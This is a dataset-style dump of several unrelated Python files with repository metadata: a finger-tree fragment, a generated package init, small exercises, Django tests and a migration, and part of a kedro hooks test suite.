        # any IMonoidOps4max is acceptable (even mk_ReversedMonoidOps, since max is commutable)
        if not isinstance(monoid_ops, IMonoidOps4max): raise ValueError
        return measurable_ops
    r'''
    ... ...TODO
        pop max?
        insert at eqvL/R keep sorted as if asc/dec??
    3'''
#end of class IFingerTreeOps__max_priority(IFingerTreeOps):
#
#HHHHH
| [
"wuming_zher@zoho.com.cn"
] | wuming_zher@zoho.com.cn |
4d27f8a2e3a7a4c655602b958bdd5755afb6049f | ad13583673551857615498b9605d9dcab63bb2c3 | /output/models/nist_data/list_pkg/unsigned_int/schema_instance/nistschema_sv_iv_list_unsigned_int_enumeration_5_xsd/__init__.py | aac688dac1eef59628983e92d248aa85f031d7b3 | [
"MIT"
] | permissive | tefra/xsdata-w3c-tests | 397180205a735b06170aa188f1f39451d2089815 | 081d0908382a0e0b29c8ee9caca6f1c0e36dd6db | refs/heads/main | 2023-08-03T04:25:37.841917 | 2023-07-29T17:10:13 | 2023-07-30T12:11:13 | 239,622,251 | 2 | 0 | MIT | 2023-07-25T14:19:04 | 2020-02-10T21:59:47 | Python | UTF-8 | Python | false | false | 395 | py | from output.models.nist_data.list_pkg.unsigned_int.schema_instance.nistschema_sv_iv_list_unsigned_int_enumeration_5_xsd.nistschema_sv_iv_list_unsigned_int_enumeration_5 import (
NistschemaSvIvListUnsignedIntEnumeration5,
NistschemaSvIvListUnsignedIntEnumeration5Type,
)
# Public re-exports of the generated schema-instance classes imported above.
__all__ = [
    "NistschemaSvIvListUnsignedIntEnumeration5",
    "NistschemaSvIvListUnsignedIntEnumeration5Type",
]
| [
"tsoulloftas@gmail.com"
] | tsoulloftas@gmail.com |
ebba29e91a30057168a0cd0f69ce39d84363309c | aa9e472929a1f3f87bbcd5cc272be99a68bf047a | /tuples/find_repeated_items.py | f5ead828d7bb5bb8c756c383020eb510d31fe6c4 | [] | no_license | stradtkt/Python-Exercises | 226706542f88973f77e6f2870b21cd87a278bf2b | 18353443b146ce6e8345fcf618d07de2bae6eb86 | refs/heads/master | 2020-03-19T16:09:51.006809 | 2018-06-30T20:28:34 | 2018-06-30T20:28:34 | 136,703,335 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 155 | py | my_tuple = 2,4,6,2,4,6,5,2,4,6,7
# Count how many times each repeated value occurs in my_tuple (defined above).
count1 = my_tuple.count(2)
count2 = my_tuple.count(4)
count3 = my_tuple.count(6)
print(count1)
print(count2)
print(count3)
"stradtkt22@gmail.com"
] | stradtkt22@gmail.com |
b281272d10fb31464d7d8a0cb4e290739c32189e | 634367d6a94d9bce231a8c29cf9713ebfc4b1de7 | /covid_dashboard/views/get_day_wise_district_details/tests/test_case_02.py | f45bf3a2ba5ff1d48aed35ca3ba4a418dcc8c048 | [] | no_license | saikiranravupalli/covid_dashboard | 5a48c97597983ada36a3bf131edf5ca15f1dedec | 954dd02819fb8f6776fa2828e8971bd55efa657c | refs/heads/master | 2022-11-08T10:11:27.836507 | 2020-06-30T09:00:27 | 2020-06-30T09:00:27 | 269,610,409 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,278 | py | """
# TODO: get_day_wise_district_details with valid district_id returns details
"""
from covid_dashboard.utils.custom_test_utils import CustomTestUtils
from . import APP_NAME, OPERATION_NAME, REQUEST_METHOD, URL_SUFFIX
# The endpoint takes no request body - send an empty JSON object.
REQUEST_BODY = """
{}
"""
# Declarative test spec (presumably consumed by CustomTestUtils.default_test_case):
# fetch day-wise details for district_id=1, authenticated via an OAuth2
# password-flow token with read scope.
TEST_CASE = {
    "request": {
        "path_params": {"district_id": "1"},
        "query_params": {},
        "header_params": {},
        "securities": {"oauth": {"tokenUrl": "http://localhost:8080/o/token", "flow": "password", "scopes": ["read"], "type": "oauth2"}},
        "body": REQUEST_BODY,
    },
}
class TestCase02GetDayWiseDistrictDetailsAPITestCase(CustomTestUtils):
    """Snapshot-checks the day-wise district details response for a valid district_id."""
    app_name = APP_NAME
    operation_name = OPERATION_NAME
    request_method = REQUEST_METHOD
    url_suffix = URL_SUFFIX
    test_case_dict = TEST_CASE
    def setupUser(self, username, password):
        # zero-argument super(): same MRO walk as the explicit two-argument form
        super().setupUser(username=username, password=password)
        self.statistics()
    def test_case(self):
        response = self.default_test_case()
        import json
        parsed_response = json.loads(response.content)
        self.assert_match_snapshot(
            name='get_day_wise_district_details_response',
            value=parsed_response
        )
| [
"saikiranravupalli@gmail.com"
] | saikiranravupalli@gmail.com |
5d51b6541ffc22ba6dbade62616ccfd70e03dba4 | e2d22f12f8e540a80d31de9debe775d35c3c5c22 | /blousebrothers/users/migrations/0002_auto_20161009_0739.py | 5caaeef0f9d6ef6321c753470fdeb2432fd49587 | [
"MIT"
] | permissive | sladinji/blousebrothers | 360c3b78ec43379977dbf470e5721e6a695b2354 | 461de3ba011c0aaed3f0014136c4497b6890d086 | refs/heads/master | 2022-12-20T10:24:07.631454 | 2019-06-13T13:17:35 | 2019-06-13T13:17:35 | 66,867,705 | 1 | 0 | NOASSERTION | 2022-12-19T18:15:44 | 2016-08-29T18:04:33 | Python | UTF-8 | Python | false | false | 757 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-10-09 07:39
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated by Django (see the header comment above): alters two
    # fields of the users app after 0001_initial.  Edit with care - migration
    # files are normally left as generated.
    dependencies = [
        ('users', '0001_initial'),
    ]
    operations = [
        # email: plain EmailField (no uniqueness declared here)
        migrations.AlterField(
            model_name='user',
            name='email',
            field=models.EmailField(max_length=254, verbose_name='email address'),
        ),
        # university: nullable FK to users.University; the verbose_name is
        # user-facing French text and is kept verbatim
        migrations.AlterField(
            model_name='user',
            name='university',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='users.University', verbose_name='Ville de CHU actuelle'),
        ),
    ]
| [
"julien.almarcha@gmail.com"
] | julien.almarcha@gmail.com |
bbc0d7036c3b0d1661ec5acc2b80f06806aeda93 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /L4HM6uMHDCnepz5HK_7.py | d5c57b4d97b416320f6e56898bb1695785da62cf | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | """
Create a function that takes date in the format **yyyy/mm/dd** as an input and
returns `"Bonfire toffee"` if the date is October 31, else return `"toffee"`.
### Examples
halloween("2013/10/31") ➞ "Bonfire toffee"
halloween("2012/07/31") ➞ "toffee"
halloween("2011/10/12") ➞ "toffee"
### Notes
N/A
"""
def halloween(d):
    """Return "Bonfire toffee" if *d* (format ``yyyy/mm/dd``) is October 31, else "toffee".

    Replaces the original lambda-bound-to-a-name (PEP 8 E731) whose
    string-multiplication-by-bool trick obscured the intent; behavior is identical.
    """
    return "Bonfire toffee" if d.endswith("10/31") else "toffee"
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
e628538fa02d09604b3f2fe873cba3fcd99a1d5c | 80e527f63953a43f7f70112759f27a75d0b25179 | /pytext/data/test/kd_doc_classification_data_handler_test.py | 8d0108c8284547354a1c3e5775a04351fee3bc40 | [
"BSD-3-Clause"
] | permissive | shruti-bh/pytext | 901c195b74a03c6efe965cbfce8fde28560e47db | ae84a5493a5331ac07699d3dfa5b9de521ea85ea | refs/heads/master | 2020-04-22T13:11:20.178870 | 2019-02-12T20:56:34 | 2019-02-12T21:20:25 | 170,400,331 | 1 | 0 | NOASSERTION | 2019-02-12T22:20:47 | 2019-02-12T22:20:47 | null | UTF-8 | Python | false | false | 3,136 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import unittest
from pytext.config.field_config import FeatureConfig
from pytext.config.kd_doc_classification import ModelInputConfig, Target, TargetConfig
from pytext.data import KDDocClassificationDataHandler
from pytext.data.featurizer import SimpleFeaturizer
from pytext.data.kd_doc_classification_data_handler import ModelInput, RawData
from pytext.utils.test_utils import import_tests_module
tests_module = import_tests_module()
class KDDocClassificationDataHandlerTest(unittest.TestCase):
    """Tests for KDDocClassificationDataHandler (knowledge-distillation doc
    classification): config creation, TSV reading, tokenization and
    target-label alignment."""
    def setUp(self):
        # Build the handler from config and read the tiny fixture TSV once
        # before each test.
        file_name = tests_module.test_file("knowledge_distillation_test_tiny.tsv")
        label_config_dict = {"target_prob": True}
        data_handler_dict = {
            "columns_to_read": [
                "text",
                "target_probs",
                "target_logits",
                "target_labels",
                "doc_label",
            ]
        }
        self.data_handler = KDDocClassificationDataHandler.from_config(
            KDDocClassificationDataHandler.Config(**data_handler_dict),
            ModelInputConfig(),
            TargetConfig(**label_config_dict),
            featurizer=SimpleFeaturizer.from_config(
                SimpleFeaturizer.Config(), FeatureConfig()
            ),
        )
        self.data = self.data_handler.read_from_file(
            file_name, self.data_handler.raw_columns
        )
    def test_create_from_config(self):
        """The handler should expose exactly the five raw columns, in order."""
        expected_columns = [
            RawData.TEXT,
            RawData.TARGET_PROBS,
            RawData.TARGET_LOGITS,
            RawData.TARGET_LABELS,
            RawData.DOC_LABEL,
        ]
        # check that the list of columns is as expected
        self.assertTrue(self.data_handler.raw_columns == expected_columns)
    def test_read_from_file(self):
        """Spot-check rows parsed from the fixture file (raw strings, unparsed)."""
        # Check if the data has 10 rows and 5 columns
        self.assertEqual(len(self.data), 10)
        self.assertEqual(len(self.data[0]), 5)
        self.assertEqual(self.data[0][RawData.TEXT], "Who R U ?")
        self.assertEqual(
            self.data[0][RawData.TARGET_PROBS],
            "[-0.005602254066616297, -5.430975914001465]",
        )
        self.assertEqual(
            self.data[0][RawData.TARGET_LABELS], '["cu:other", "cu:ask_Location"]'
        )
    def test_tokenization(self):
        """Preprocessing should tokenize/lowercase text and parse the
        target-probability string into a list of floats."""
        data = list(self.data_handler.preprocess(self.data))
        # test tokenization without language-specific tokenizers
        self.assertListEqual(data[0][ModelInput.WORD_FEAT], ["who", "r", "u", "?"])
        self.assertListEqual(
            data[0][Target.TARGET_PROB_FIELD],
            [-0.005602254066616297, -5.430975914001465],
        )
    def test_align_target_label(self):
        """Per-row target scores must be re-ordered to match the global label list."""
        target = [[0.1, 0.2, 0.3], [0.1, 0.2, 0.3]]
        label_list = ["l1", "l2", "l3"]
        batch_label_list = [["l3", "l2", "l1"], ["l1", "l3", "l2"]]
        align_target = self.data_handler._align_target_label(
            target, label_list, batch_label_list
        )
        self.assertListEqual(align_target, [[0.3, 0.2, 0.1], [0.1, 0.3, 0.2]])
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
f83506a11c7bb222bdbd4f3d5c0f18adfbef24c5 | 385ab972316b41cb0643f1050f9220b8eaeb4647 | /cutTheSticks.py | b33dc260c16a89e751d1f3844911ef48097f6cb2 | [] | no_license | Rpratik13/HackerRank | 09174c9b331e25cec33848a80e9109800cdbc894 | 38b9a39261bfb3b2fc208ad1e3d8a485585b419a | refs/heads/master | 2020-03-22T05:24:03.516086 | 2020-01-31T16:08:19 | 2020-01-31T16:08:19 | 139,563,106 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 332 | py | def cutTheSticks(arr):
ans = []
while max(arr)!=0:
while min(arr)==0:
arr.remove(0)
min1 = min(arr)
count = 0
for i in range(0,len(arr)):
arr[i]-=min1
count+=1
ans.append(count)
return ans
# HackerRank stdin driver: first line is the stick count (read but unused --
# the split below consumes all values), second line the stick lengths.
n = int(input())
arr = list(map(int, input().rstrip().split()))
result = cutTheSticks(arr)
# One count per line, as required by the judge.
for i in result:
    print(i)
"r.pratik013@gmail.com"
] | r.pratik013@gmail.com |
3019e63efae8bf251345dedc6ade8214439b4276 | d9504b779ca6d25a711c13fafc1b8669c60e6f62 | /shape_recognition/libraries/braile_recognition/plotScript.py | 4a9bd429775020ba0b1151785b48933dbe7560e2 | [
"MIT"
] | permissive | ys1998/tactile-shape-recognition | dcdd3f4da66b4b3f6159dccf9cec4d367f6483d9 | b5ab6f1cdf04ff23e14b467a590533e7ee740b52 | refs/heads/master | 2020-03-18T03:01:17.985074 | 2018-07-28T09:46:16 | 2018-07-28T09:46:16 | 134,218,923 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 239 | py | import numpy as np
import matplotlib.pyplot as plt
c = 0
r = 3
s = np.loadtxt('./NewData_BRC/BRC_B5.txt')
taxel = []
for k in range(c,len(s),4):
taxel.append(s[k,r])
print len(taxel)
plt.figure()
plt.plot(taxel)
plt.show()
| [
"yashshah2398@gmail.com"
] | yashshah2398@gmail.com |
8d5a89a05b311b9d5137c404950505cd7eac5bfa | f3f7099576adfb683fb74c575b235bdd6c2900c7 | /examples/demos_by_system/pendulum_double/double_pendulum_with_lqr.py | cda2f8818732a357ed072532029e056e2fe8a0f4 | [
"MIT"
] | permissive | SherbyRobotics/pyro | a1fac4508162aff662c4c6073eb2adf357b1bc8b | baed84610d6090d42b814183931709fcdf61d012 | refs/heads/master | 2023-08-08T16:16:31.510887 | 2023-07-26T17:36:26 | 2023-07-26T17:36:26 | 153,139,985 | 35 | 23 | MIT | 2023-07-26T17:36:27 | 2018-10-15T15:45:09 | Python | UTF-8 | Python | false | false | 801 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun May 24 11:51:18 2020
@author: alex
"""
import numpy as np
from pyro.dynamic.pendulum import DoublePendulum
from pyro.analysis.costfunction import QuadraticCostFunction
from pyro.dynamic.statespace import linearize
from pyro.control.lqr import synthesize_lqr_controller
# Non-linear model: double pendulum
sys = DoublePendulum()
# Linear model: numerical linearization of the dynamics (step size 0.01)
ss = linearize( sys , 0.01 )
# Cost function: quadratic cost built from the system's dimensions,
# with the input-weight diagonal raised to penalize actuator effort
cf = QuadraticCostFunction.from_sys( sys )
cf.R[0,0] = 1000
cf.R[1,1] = 10000
# LQR controller synthesized from the linearized model and the cost
ctl = synthesize_lqr_controller( ss , cf )
# Simulation Closed-Loop Non-linear with LQR controller,
# starting from a perturbed initial state (first joint at 0.4 rad)
cl_sys = ctl + sys
cl_sys.x0 = np.array([0.4,0,0,0])
cl_sys.compute_trajectory()
cl_sys.plot_trajectory('xu')
cl_sys.animate_simulation()
"alx87grd@gmail.com"
] | alx87grd@gmail.com |
ea960fdb336509f7286bd45c359d6f34b4776066 | 3d6704216b1acfe1c97048c1999657537596916c | /django_test/users/validators/password.py | 458a8e4d1aacd4add82592ca255529af6447b942 | [] | no_license | jupiny/django_test | e2310ee485e570e92b3f66e7f23dfa8c36a63c58 | b3ef08259177229166e54ede8f7315e2522af438 | refs/heads/master | 2021-01-17T15:46:06.636001 | 2016-11-03T05:27:34 | 2016-11-03T05:27:34 | 59,828,511 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 875 | py | import re
from django.core.exceptions import ValidationError
MINIMUM_LENGTH = 8
def validate_minimum_length(value):
    """Django validator: reject passwords shorter than MINIMUM_LENGTH characters."""
    if len(value) >= MINIMUM_LENGTH:
        return
    raise ValidationError(
        "The password should be at least {0} characters long.".format(MINIMUM_LENGTH)
    )
def validate_letters(value):
# Number
if not re.search(r'[0-9]', value):
raise ValidationError("Password must contain at least 1 digit.")
# Lowercase letters
if not re.search(r'[a-z]', value):
raise ValidationError("Password must contain at least 1 lowercase letter.")
# Uppercase letters
if not re.search(r'[A-Z]', value):
raise ValidationError("Password must contain at least 1 uppercase letter.")
# Special characters
if not re.search(r'[!@#$%^&*+=]', value):
raise ValidationError("Password must contain at least 1 special character.")
| [
"tmdghks584@gmail.com"
] | tmdghks584@gmail.com |
ca6c45bf21e217f99fdab1def87ac38681fe797e | f901fae034458703f5ca9a9a81433a2dcb1b8b1c | /tests/framework/hooks/test_context_hooks.py | b6b68abfe99bbe9098429bde1747b883483e577a | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | kiminh/kedro | bb6df5867bcca307adc0b321343da70f5c899540 | 8c0a8ccbffa22daf64a31fea138402a34fd51f2b | refs/heads/master | 2022-12-09T10:05:34.300506 | 2020-09-23T12:28:47 | 2020-09-23T12:28:47 | 299,792,869 | 1 | 0 | NOASSERTION | 2020-09-30T02:49:54 | 2020-09-30T02:49:53 | null | UTF-8 | Python | false | false | 27,700 | py | # Copyright 2020 QuantumBlack Visual Analytics Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND
# NONINFRINGEMENT. IN NO EVENT WILL THE LICENSOR OR OTHER CONTRIBUTORS
# BE LIABLE FOR ANY CLAIM, DAMAGES, OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF, OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# The QuantumBlack Visual Analytics Limited ("QuantumBlack") name and logo
# (either separately or in combination, "QuantumBlack Trademarks") are
# trademarks of QuantumBlack. The License does not grant you any right or
# license to the QuantumBlack Trademarks. You may not use the QuantumBlack
# Trademarks or any confusingly similar mark as a trademark for your product,
# or use the QuantumBlack Trademarks in any other manner that might cause
# confusion in the marketplace, including but not limited to in advertising,
# on websites, or on software.
#
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import re
import sys
from collections import namedtuple
from logging.handlers import QueueHandler, QueueListener
from multiprocessing import Queue
from pathlib import Path
from typing import Any, Dict, Iterable, List, Optional, Union
import pandas as pd
import pytest
import yaml
from kedro import __version__
from kedro.config import ConfigLoader
from kedro.framework.context import KedroContext
from kedro.framework.context.context import _convert_paths_to_absolute_posix
from kedro.framework.hooks import hook_impl
from kedro.framework.hooks.manager import _create_hook_manager
from kedro.io import DataCatalog
from kedro.pipeline import Pipeline
from kedro.pipeline.node import Node, node
from kedro.runner import ParallelRunner
from kedro.versioning import Journal
@pytest.fixture
def local_logging_config():
    """Minimal ``logging.config.dictConfig``-style configuration, written to
    conf/local/logging.yml by the ``config_dir`` fixture."""
    return {
        "version": 1,
        "formatters": {
            "simple": {"format": "%(asctime)s - %(name)s - %(levelname)s - %(message)s"}
        },
        "root": {"level": "INFO", "handlers": ["console"]},
        "loggers": {"kedro": {"level": "INFO", "handlers": ["console"]}},
        "handlers": {
            "console": {
                "class": "logging.StreamHandler",
                "level": "INFO",
                "formatter": "simple",
                "stream": "ext://sys.stdout",
            }
        },
    }
def _write_yaml(filepath: Path, config: Dict) -> None:
    """Serialize *config* as YAML to *filepath*, creating parent directories."""
    filepath.parent.mkdir(parents=True, exist_ok=True)
    yaml_str = yaml.dump(config)
    filepath.write_text(yaml_str)
@pytest.fixture
def local_config(tmp_path):
    """Catalog configuration with two versioned CSV datasets rooted in *tmp_path*."""
    cars_filepath = str(tmp_path / "cars.csv")
    boats_filepath = str(tmp_path / "boats.csv")
    return {
        "cars": {
            "type": "pandas.CSVDataSet",
            "filepath": cars_filepath,
            "save_args": {"index": False},
            "versioned": True,
        },
        "boats": {
            "type": "pandas.CSVDataSet",
            "filepath": boats_filepath,
            "versioned": True,
        },
    }
@pytest.fixture(autouse=True)
def config_dir(tmp_path, local_config, local_logging_config):
    """Lay out a minimal kedro project config tree under *tmp_path* for every test."""
    # NOTE(review): the local name `logging` shadows the stdlib module inside
    # this fixture; harmless here, but rename if the fixture ever needs logging.
    catalog = tmp_path / "conf" / "base" / "catalog.yml"
    credentials = tmp_path / "conf" / "local" / "credentials.yml"
    logging = tmp_path / "conf" / "local" / "logging.yml"
    kedro_yml = tmp_path / ".kedro.yml"
    _write_yaml(catalog, local_config)
    _write_yaml(credentials, {"dev_s3": "foo"})
    _write_yaml(logging, local_logging_config)
    _write_yaml(kedro_yml, {})
@pytest.fixture(autouse=True)
def hook_manager(monkeypatch):
    """Give every test a fresh hook manager by patching all module-level
    ``get_hook_manager`` accessors to return it."""
    # re-create the global hook manager after every test
    hook_manager = _create_hook_manager()
    monkeypatch.setattr("kedro.framework.hooks.get_hook_manager", lambda: hook_manager)
    monkeypatch.setattr(
        "kedro.framework.context.context.get_hook_manager", lambda: hook_manager
    )
    monkeypatch.setattr("kedro.runner.runner.get_hook_manager", lambda: hook_manager)
    return hook_manager
def identity(x: str) -> str:
    """Return *x* unchanged; used as the node function in ``context_pipeline``."""
    return x
def broken_node():
    """Always raise ValueError("broken"); used to exercise the error hooks."""
    raise ValueError("broken")
def assert_exceptions_equal(e1: Exception, e2: Exception):
    """Assert *e1* is an instance of *e2*'s type with the same message."""
    same_type = isinstance(e1, type(e2))
    same_message = str(e1) == str(e2)
    assert same_type and same_message
@pytest.fixture
def dummy_dataframe():
    """Two-row DataFrame used as the input data for the test pipelines."""
    return pd.DataFrame({"test": [1, 2]})
# Two identity nodes (cars -> planes, boats -> ships) shared by the test
# contexts and the hooks' register_pipelines implementations below.
context_pipeline = Pipeline(
    [
        node(identity, "cars", "planes", name="node1"),
        node(identity, "boats", "ships", name="node2"),
    ],
    tags="pipeline",
)
class LoggingHooks:
    """A set of test hooks that only log information when invoked.
    Use a log queue to properly test log messages written by hooks invoked by ParallelRunner.
    """
    # Logger name the test assertions filter records by.
    handler_name = "hooks_handler"
    def __init__(self, logs_queue):
        self.logger = logging.getLogger("hooks_handler")
        self.logger.handlers = []
        self.queue = logs_queue
        self.queue_handler = QueueHandler(self.queue)
        # We need this queue listener to prevent pytest from hanging on Windows.
        self.queue_listener = QueueListener(self.queue)
        self.logger.addHandler(self.queue_handler)
    @hook_impl
    def after_catalog_created(
        self,
        catalog: DataCatalog,
        conf_catalog: Dict[str, Any],
        conf_creds: Dict[str, Any],
        feed_dict: Dict[str, Any],
        save_version: str,
        load_versions: Dict[str, str],
        run_id: str,
    ):
        """Log every argument the after_catalog_created hook receives."""
        self.logger.info(
            "Catalog created",
            extra={
                "catalog": catalog,
                "conf_catalog": conf_catalog,
                "conf_creds": conf_creds,
                "feed_dict": feed_dict,
                "save_version": save_version,
                "load_versions": load_versions,
                "run_id": run_id,
            },
        )
    @hook_impl
    def before_node_run(
        self,
        node: Node,
        catalog: DataCatalog,
        inputs: Dict[str, Any],
        is_async: bool,
        run_id: str,
    ) -> None:
        """Log every argument the before_node_run hook receives."""
        self.logger.info(
            "About to run node",
            extra={
                "node": node,
                "catalog": catalog,
                "inputs": inputs,
                "is_async": is_async,
                "run_id": run_id,
            },
        )
    @hook_impl
    def after_node_run(
        self,
        node: Node,
        catalog: DataCatalog,
        inputs: Dict[str, Any],
        outputs: Dict[str, Any],
        is_async: bool,
        run_id: str,
    ) -> None:
        """Log every argument the after_node_run hook receives."""
        self.logger.info(
            "Ran node",
            extra={
                "node": node,
                "catalog": catalog,
                "inputs": inputs,
                "outputs": outputs,
                "is_async": is_async,
                "run_id": run_id,
            },
        )
    @hook_impl
    def on_node_error(
        self,
        error: Exception,
        node: Node,
        catalog: DataCatalog,
        inputs: Dict[str, Any],
        is_async: bool,
        run_id: str,
    ):
        """Log every argument the on_node_error hook receives."""
        self.logger.info(
            "Node error",
            extra={
                "error": error,
                "node": node,
                "catalog": catalog,
                "inputs": inputs,
                "is_async": is_async,
                "run_id": run_id,
            },
        )
    @hook_impl
    def before_pipeline_run(
        self, run_params: Dict[str, Any], pipeline: Pipeline, catalog: DataCatalog
    ) -> None:
        """Log every argument the before_pipeline_run hook receives."""
        self.logger.info(
            "About to run pipeline",
            extra={"pipeline": pipeline, "run_params": run_params, "catalog": catalog},
        )
    @hook_impl
    def after_pipeline_run(
        self, run_params: Dict[str, Any], pipeline: Pipeline, catalog: DataCatalog
    ) -> None:
        """Log every argument the after_pipeline_run hook receives."""
        self.logger.info(
            "Ran pipeline",
            extra={"pipeline": pipeline, "run_params": run_params, "catalog": catalog},
        )
    @hook_impl
    def on_pipeline_error(
        self,
        error: Exception,
        run_params: Dict[str, Any],
        pipeline: Pipeline,
        catalog: DataCatalog,
    ) -> None:
        """Log every argument the on_pipeline_error hook receives."""
        self.logger.info(
            "Pipeline error",
            extra={
                "error": error,
                "run_params": run_params,
                "pipeline": pipeline,
                "catalog": catalog,
            },
        )
    @hook_impl
    def register_pipelines(self) -> Dict[str, Pipeline]:
        """Register the shared test pipeline under two names and log the call."""
        self.logger.info("Registering pipelines")
        return {"__default__": context_pipeline, "de": context_pipeline}
    @hook_impl
    def register_config_loader(self, conf_paths: Iterable[str]) -> ConfigLoader:
        """Return a plain ConfigLoader, logging the conf paths it was given."""
        self.logger.info("Registering config loader", extra={"conf_paths": conf_paths})
        return ConfigLoader(conf_paths)
    @hook_impl
    def register_catalog(
        self,
        catalog: Optional[Dict[str, Dict[str, Any]]],
        credentials: Dict[str, Dict[str, Any]],
        load_versions: Dict[str, str],
        save_version: str,
        journal: Journal,
    ) -> DataCatalog:
        """Build the catalog from config, logging every argument received."""
        self.logger.info(
            "Registering catalog",
            extra={
                "catalog": catalog,
                "credentials": credentials,
                "load_versions": load_versions,
                "save_version": save_version,
                "journal": journal,
            },
        )
        return DataCatalog.from_config(
            catalog, credentials, load_versions, save_version, journal
        )
class DuplicateHooks:
    """Hooks whose pipelines deliberately re-use the "__default__" key so the
    duplicate-entry warning path can be tested."""
    @hook_impl
    def register_pipelines(self) -> Dict[str, Pipeline]:
        return {"__default__": context_pipeline, "pipe": context_pipeline}
@pytest.fixture
def logs_queue():
    """Multiprocessing queue that collects hook log records across processes."""
    return Queue()
@pytest.fixture
def logging_hooks(logs_queue):
    """LoggingHooks instance wired to the shared multiprocessing log queue."""
    return LoggingHooks(logs_queue)
def _create_kedro_yml(
    project_path, project_name, project_version, package_name, disable_hooks_for=None
):
    """Write a minimal .kedro.yml into *project_path*.

    ``disable_hooks_for`` (list of plugin names) populates the
    ``disable_hooks_for_plugins`` key; ``None`` becomes an empty list.
    """
    kedro_yml = project_path / ".kedro.yml"
    disable_hooks_for = disable_hooks_for or []
    payload = {
        "project_name": project_name,
        "project_version": project_version,
        "package_name": package_name,
        "disable_hooks_for_plugins": disable_hooks_for,
    }
    with kedro_yml.open("w") as _f:
        yaml.safe_dump(payload, _f)
def _create_context_with_hooks(tmp_path, mocker, context_hooks, disable_hooks_for=None):
    """Create a context with some Hooks registered. We do this in a function
    to support both calling it directly as well as as part of a fixture.
    """
    _create_kedro_yml(
        tmp_path, "test hooks", __version__, "test_hooks", disable_hooks_for
    )
    class DummyContextWithHooks(KedroContext):
        # Hooks attached via the class attribute; fixed run id so tests can
        # assert on it deterministically.
        hooks = tuple(context_hooks)
        def _get_run_id(self, *args, **kwargs) -> Union[None, str]:
            return "mocked context with hooks run id"
    # Patch dictConfig -- presumably so the project's logging.yml does not
    # reconfigure the test process logging; TODO confirm.
    mocker.patch("logging.config.dictConfig")
    return DummyContextWithHooks(str(tmp_path), env="local")
@pytest.fixture
def context_with_hooks(tmp_path, mocker, logging_hooks):
    """Context with LoggingHooks registered; the queue listener runs for the
    duration of the test."""
    logging_hooks.queue_listener.start()
    yield _create_context_with_hooks(tmp_path, mocker, [logging_hooks])
    logging_hooks.queue_listener.stop()
@pytest.fixture
def context_with_duplicate_hooks(tmp_path, mocker, logging_hooks):
    """Context registering both LoggingHooks and DuplicateHooks, so their
    pipelines collide on the "__default__" key."""
    logging_hooks.queue_listener.start()
    hooks = (logging_hooks, DuplicateHooks())
    yield _create_context_with_hooks(tmp_path, mocker, hooks)
    logging_hooks.queue_listener.stop()
@pytest.fixture
def broken_context_with_hooks(tmp_path, mocker, logging_hooks):
    """Context whose pipeline nodes always raise, for testing error hooks."""
    logging_hooks.queue_listener.start()
    yield _create_broken_context_with_hooks(tmp_path, mocker, [logging_hooks])
    logging_hooks.queue_listener.stop()
def _create_broken_context_with_hooks(tmp_path, mocker, context_hooks):
    """Create a context whose default pipeline consists of two nodes that
    always raise ValueError("broken")."""
    _create_kedro_yml(tmp_path, "broken-context", __version__, "broken")
    class BrokenContextWithHooks(KedroContext):
        hooks = tuple(context_hooks)
        def _get_pipelines(self) -> Dict[str, Pipeline]:
            pipeline = Pipeline(
                [
                    node(broken_node, None, "A", name="node1"),
                    node(broken_node, None, "B", name="node2"),
                ],
                tags="pipeline",
            )
            return {"__default__": pipeline}
    # Patch dictConfig -- presumably so the project's logging.yml does not
    # reconfigure the test process logging; TODO confirm.
    mocker.patch("logging.config.dictConfig")
    return BrokenContextWithHooks(tmp_path, env="local")
def _assert_hook_call_record_has_expected_parameters(
call_record: logging.LogRecord, expected_parameters: List[str]
):
"""Assert the given call record has all expected parameters."""
for param in expected_parameters:
assert hasattr(call_record, param)
# Stand-in for setuptools plugin distribution info used by hook-manager mocks.
MockDistInfo = namedtuple("Distinfo", ["project_name", "version"])
class TestKedroContextHooks:
    """Lifecycle-hook tests: registration, catalog/pipeline/node hooks, and
    error hooks, with both sequential and parallel runners."""
    def test_calling_register_hooks_multiple_times_should_not_raise(
        self, context_with_hooks
    ):
        context_with_hooks._register_hooks()
        context_with_hooks._register_hooks()
        assert True # if we get to this statement, it means the previous repeated calls don't raise
    @pytest.mark.parametrize("num_plugins", [0, 1])
    def test_hooks_are_registered_when_context_is_created(
        self, tmp_path, mocker, logging_hooks, hook_manager, num_plugins, caplog
    ):
        """Context creation registers class hooks and loads plugin hooks from
        the "kedro.hooks" entry point, logging how many were found."""
